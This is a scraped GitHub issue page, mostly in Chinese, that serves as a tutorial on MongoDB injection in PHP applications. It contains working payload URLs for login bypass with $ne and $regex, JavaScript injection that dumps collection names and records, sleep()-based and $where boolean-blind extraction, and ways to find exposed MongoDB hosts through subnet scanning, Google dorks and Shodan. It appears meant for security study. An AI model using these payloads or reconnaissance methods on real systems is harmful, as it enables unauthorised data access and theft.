We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Wisdom outweighs any wealth.
MongoDB
PHP
mongo
增查减改
<?php $mongo = new mongoclient(); $db = $mongo->myinfo; //选择数据库 $coll = $db->test; //选择集合 $coll->save(); //增 $coll->find(); //查 $coll->remove(); //减 $coll->update(); //改
数组
execute
<?php $mongo = new mongoclient(); $db = $mongo->myinfo; //选择数据库 $query = "db.table.save({'newsid':1})"; //增 $query = "db.table.find({'newsid':1})"; //查 $query = "db.table.remove({'newsid':1})"; //减 $query = "db.table.update({'newsid':1},{'newsid',2})"; 改 $result = $db->execute($query);
$query
js
test
URL
http://127.0.0.1/2.php?username=test&password=test
db.test.find({username:'test', password:'test'});
http://127.0.0.1/2.php?username[xx]=test&password=test
$username
php
$data = array( 'username' => array('xx'=>'test'), 'password' => 'test' );
db.test.find({username:{'xx':'test'}, password:'test'});
http://127.0.0.1/2.php?username[$ne]=test&password[$ne]=test
$ne
db.test.find({username:{'$ne':'test'}, password:{'$ne':'test'}});
SQL
select * from test where username!='test' and password!='test';
$regex
http://127.0.0.1/1.php?username=test'&password=test
http://127.0.0.1/1.php?username=test'});return {username:1,password:2}//&password=test
username
1
password
2
http://127.0.0.1/1.php?username=test'});return {username:tojson(db.getCollectionNames()),password:2}//&password=test
db.getCollectionNames()
tojson
http://127.0.0.1/1.php?username=test'});return {username:tojson(db.test.find()[0]),password:2}//&password=test
sleep()
http://127.0.0.1/1.php?username=test'});if (db.version() > "0") {sleep(10000); exit;} var b=({a:'1&password=test
$where
where
http://127.0.0.1/3.php?news=test
http://127.0.0.1/3.php?news=test'
// %26=& http://127.0.0.1/3.php?news=test'%26%26'1'=='1
http://127.0.0.1/3.php?news=test'%26%26'1'=='2
http://127.0.0.1/3.php?news=test'%26%26db.getCollectionNames().length>0%26%26'1'=='1
http://127.0.0.1/3.php?news=test'%26%26db.getCollectionNames()[0].length==6%26%26'1'=='1
http://127.0.0.1/3.php?news=test'%26%26db.getCollectionNames()[0][0]>'a'%26%26'1'=='1
http://127.0.0.1/3.php?news=test'%26%26tojson(db.user.find()[0])[0]=='{'%26%26'1'=='1
db.user.find()
Python
27017
C段
B段
Nmap
XScan
NC
WVS
Google
intitle:mongodb inurl:28017
intitle:mongodb inurl:28017 admin
28017
外部链接IP
IP反向域名解析
80
ZoomEye
Shodan
The text was updated successfully, but these errors were encountered:
No branches or pull requests
0x01 SQL注入
MongoDBPHP下操作MongoDB有以下两种方式mongo类中相应的方法执行增查减改,比如:数组execute方法执行字符串,比如:execute的参数是字符串变量$query,此时的字符串书写语法为js的书写语法test是攻击者已知的帐号密码URL为URL如下$username是一个数组,也就相当于执行了php语句MongoDB对于多维数组的解析使最终执行了如下语句URL$ne正是一个MongoDB操作符,最终执行了语句SQL$regex操作符来一位一位获取数据username为1,password为2MongoDB中所有集合名db.getCollectionNames()返回的是数组,需要用tojson转换成字符串,并且MongoDB区分大小写test集合第一条数据sleep(),即时间盲注MongoDB中可以使用$where操作符,相当于SQL语句中的where限制语句,MongoDB中的$where操作符常常引入一个js的函数作为限制条件,当js函数中的字符串存在未过滤的用户输入时,注入就产生了*注入方式
db.user.find()返回的不是一个字符串,无法取出字符进行比较,所以用tojson可以将它转化成一个json字符串,就可以比较了Python写个循环脚本即可实现自动化MongoDB的方法27017端口,C段,B段,看带宽和服务器资源Nmap,XScan,NC,WVS,一般NmapGoogleintitle:mongodb inurl:28017intitle:mongodb inurl:28017 admin28017端口是MongoDB的一个状态检测页面,有它在一般都会存在27017端口,上面会显示外部链接IP,利用IP反向域名解析查询,找到链接的网站或应用,另一种方法就是查看数据库信息,或者同网段扫80端口,链接外部地址扫80端口ZoomEye、Shodan网络空间搜索引擎The text was updated successfully, but these errors were encountered: